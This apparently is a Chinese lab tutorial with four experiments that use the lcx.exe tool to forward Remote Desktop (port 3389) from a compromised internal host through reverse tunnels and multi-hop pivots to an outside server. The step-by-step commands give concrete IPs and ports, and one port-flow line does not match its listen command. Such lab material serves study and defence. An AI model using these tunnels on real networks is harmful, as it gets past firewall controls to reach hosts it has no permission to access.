LCX转发实验一
环境:内网3389端口不对外开放,但是1234端口对外开放(正向连接)
lcx .exe –tran 1234 127.0.0.1 3389
过程:192.168.1.105: 1234 -> 3389
LCX转发实验二
环境:内网主机可以访问外网80端口,同时3389端口只内网访问(反向连接)
步骤一:外网服务器开启监听
lcx.exe -listen 80 5555
步骤二:将被控主机端口转发到外网服务器
lcx.exe –slave 公网 IP + 端口 被控服务器IP + 端口
lcx.exe -slave 192.168.1.102 80 127.0.0.1 3389
步骤三:在外网服务器连接本地5555端口
然后远程桌面(mstsc) 127.0.0.1:5555
过程:本地:5555 -> 4444 -> 192.168.1.105 3389
![在这里插入图片描述](https://img-blog.csdnimg.cn/2020031817100882.png
LCX转发实验三
环境:内网主机不能访问外网,但是可以访问同网段的内网机器,同时3389端口只内网访问
步骤一:外网服务器开启监听
lcx.exe -listen 4444 5555
步骤二:将被控主机端口转发到外网服务器
lcx.exe –slave 公网 IP + 端口 被控服务器IP + 端口
lcx.exe -slave 192.168.203.137 4444 10.1.1.2 3389
步骤三:在外网服务器连接本地5555端口
然后mstsc 127.0.0.1:5555
过程:本地 5555 -> 4444 -> 192.168.203.138 -> 10.1.1.2 3389
LCX转发实验四
环境:内网主机不能访问外网,但是可以访问同网段的内网机器,同时3389端口只能本地访问,但是80端口对外开放。
步骤一:被控服务器的3389端口转发到本地的8080端口
lcx.exe -tran 8080 127.0.0.1 3389
步骤二:在能够对外访问的内网机器上监听端口
lcx –listen 4444 5555
步骤三: 在内网被控服务器上连接内网能够对外访问的服务器
Lcx.exe –slave 192.168.203.137 4444 10.1.1.1 8080
步骤四:在外网服务器连接本地5555端口
然后mstsc 127.0.0.1:5555
过程:本地 5555 -> 4444 -> 192.168.203.138 -> 10.1.1.2 8080 -> 3389